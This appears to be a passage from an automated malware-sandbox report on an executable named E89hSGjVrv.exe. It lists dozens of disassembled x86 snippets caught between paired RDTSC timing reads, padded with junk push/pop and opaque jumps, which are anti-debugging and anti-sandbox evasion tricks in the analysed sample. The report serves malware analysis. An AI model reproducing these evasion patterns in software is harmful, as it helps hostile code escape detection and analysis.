              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F63148 second address: F6316B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnl 00007F5048C0A326h 0x0000000d jmp 00007F5048C0A32Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007F5048C0A326h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5FD00 second address: F5FD04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F646A6 second address: F646AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DD8C second address: F5DD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5FD04 second address: F5FD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5048C0A328h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov bx, dx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 sub dword ptr [ebp+12450B21h], eax 0x00000039 mov eax, dword ptr [ebp+122D1149h] 0x0000003f add di, D700h 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F5048C0A328h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 cld 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 jmp 00007F5048C0A337h 0x0000006a pop esi 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F646AD second address: F646C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F50492D81A0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5FD8D second address: F5FD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DD91 second address: F5DE4C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F50492D819Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F50492D8198h 0x00000012 pop edx 0x00000013 nop 0x00000014 jmp 00007F50492D81A6h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F50492D8198h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a add edi, dword ptr [ebp+122D2E28h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 jmp 00007F50492D81A1h 0x0000004c mov eax, dword ptr [ebp+122D0B91h] 0x00000052 mov dword ptr [ebp+122D5907h], edx 0x00000058 push FFFFFFFFh 0x0000005a movzx edi, bx 0x0000005d nop 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F50492D819Bh 0x00000065 jne 00007F50492D8196h 0x0000006b popad 0x0000006c pop edx 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jnp 00007F50492D81A6h 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DE4C second address: F5DE56 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5048C0A32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F66752 second address: F66757 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F6776F second address: F67775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F67775 second address: F67779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F6785E second address: F67864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0ABA4 second address: F0ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0ABAA second address: F0ABCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F5048C0A343h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F71845 second address: F71850 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F20 second address: F70F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F24 second address: F70F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F50492D81A3h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F3F second address: F70F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F43 second address: F70F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F49 second address: F70F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F5048C0A32Bh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jo 00007F5048C0A326h 0x00000012 popad 0x00000013 jno 00007F5048C0A334h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e jnp 00007F5048C0A326h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F70F87 second address: F70F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F710FD second address: F71107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F71408 second address: F7140C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F73061 second address: F73065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F73065 second address: F73069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F73069 second address: F73075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F73075 second address: F73079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F73079 second address: F73081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F771ED second address: F771F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F78688 second address: F7868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7868D second address: F786C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F50492D819Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F50492D81A0h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007F50492D81A0h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F786C7 second address: F786CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F786CB second address: F786DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007F50492D81A4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F786DD second address: F786F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5048C0A326h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F788A3 second address: F788E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F50492D8196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 jnp 00007F50492D819Ch 0x00000019 pop esi 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F50492D81A5h 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F50492D819Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F788E8 second address: F788EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F788EC second address: D9FB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F50492D81B3h 0x00000013 je 00007F50492D81ADh 0x00000019 jmp 00007F50492D81A7h 0x0000001e pop eax 0x0000001f jno 00007F50492D819Eh 0x00000025 jns 00007F50492D81A1h 0x0000002b push dword ptr [ebp+122D0BD9h] 0x00000031 jmp 00007F50492D819Ah 0x00000036 call dword ptr [ebp+122D1A63h] 0x0000003c pushad 0x0000003d add dword ptr [ebp+122D1B47h], ebx 0x00000043 xor eax, eax 0x00000045 mov dword ptr [ebp+122D1C6Bh], edx 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f jmp 00007F50492D81A3h 0x00000054 mov dword ptr [ebp+122D36CAh], eax 0x0000005a stc 0x0000005b stc 0x0000005c mov esi, 0000003Ch 0x00000061 jmp 00007F50492D81A2h 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a add dword ptr [ebp+122D1AE6h], edx 0x00000070 lodsw 0x00000072 or dword ptr [ebp+122D1AE6h], eax 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007F50492D81A7h 0x00000081 jmp 00007F50492D81A3h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a mov dword ptr [ebp+122D1B6Ah], eax 0x00000090 push eax 0x00000091 push ebx 0x00000092 push esi 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7E470 second address: F7E474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D20B second address: F7D218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F50492D819Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D218 second address: F7D21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D758 second address: F7D762 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D762 second address: F7D76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5048C0A326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D76C second address: F7D774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D774 second address: F7D77E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5048C0A336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D77E second address: F7D795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D819Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D795 second address: F7D7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D934 second address: F7D948 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F50492D8198h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c js 00007F50492D8196h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7D948 second address: F7D94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7E1BA second address: F7E1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7E1BE second address: F7E1CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5048C0A326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F7E1CA second address: F7E1D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F50492D8196h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8168E second address: F816A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F5048C0A332h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F816A8 second address: F816B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F00B01 second address: F00B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F86CCA second address: F86CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F86CCE second address: F86CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F86CD6 second address: F86CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F86CDC second address: F86CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A334h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F86E66 second address: F86E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F870FE second address: F87104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F87104 second address: F8710E instructions: 0x00000000 rdtsc 0x00000002 je 00007F50492D8196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8710E second address: F8712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Ch 0x00000007 jne 00007F5048C0A328h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8712B second address: F87155 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F50492D8196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jnc 00007F50492D81A7h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F87155 second address: F8715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8766A second address: F87670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F87670 second address: F87674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F87674 second address: F8767F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8767F second address: F87693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5048C0A326h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jng 00007F5048C0A326h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8C06B second address: F8C076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8C076 second address: F8C07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F51B8C second address: F2ECEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F50492D8196h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F50492D819Ah 0x00000016 lea eax, dword ptr [ebp+124858FCh] 0x0000001c mov dword ptr [ebp+1244DDADh], edx 0x00000022 push eax 0x00000023 jne 00007F50492D81A8h 0x00000029 mov dword ptr [esp], eax 0x0000002c adc cl, 00000027h 0x0000002f call dword ptr [ebp+122D58B3h] 0x00000035 jnl 00007F50492D81A8h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52084 second address: D9FB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5048C0A333h 0x0000000f nop 0x00000010 mov di, ax 0x00000013 movzx edi, di 0x00000016 push dword ptr [ebp+122D0BD9h] 0x0000001c sub dx, 3D2Fh 0x00000021 call dword ptr [ebp+122D1A63h] 0x00000027 pushad 0x00000028 add dword ptr [ebp+122D1B47h], ebx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1C6Bh], edx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007F5048C0A333h 0x0000003f mov dword ptr [ebp+122D36CAh], eax 0x00000045 stc 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F5048C0A332h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 add dword ptr [ebp+122D1AE6h], edx 0x0000005b lodsw 0x0000005d or dword ptr [ebp+122D1AE6h], eax 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jmp 00007F5048C0A337h 0x0000006c jmp 00007F5048C0A333h 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007b push eax 0x0000007c push ebx 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F521F6 second address: F521FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F521FA second address: F52219 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d jnc 00007F5048C0A328h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52219 second address: F5221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5221E second address: F52246 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F5048C0A326h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jne 00007F5048C0A328h 0x00000013 push 8B519EB0h 0x00000018 je 00007F5048C0A332h 0x0000001e jbe 00007F5048C0A32Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F522FA second address: F5230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], esi 0x00000009 mov ecx, dword ptr [ebp+122D17F4h] 0x0000000f nop 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5230E second address: F5231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5048C0A326h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
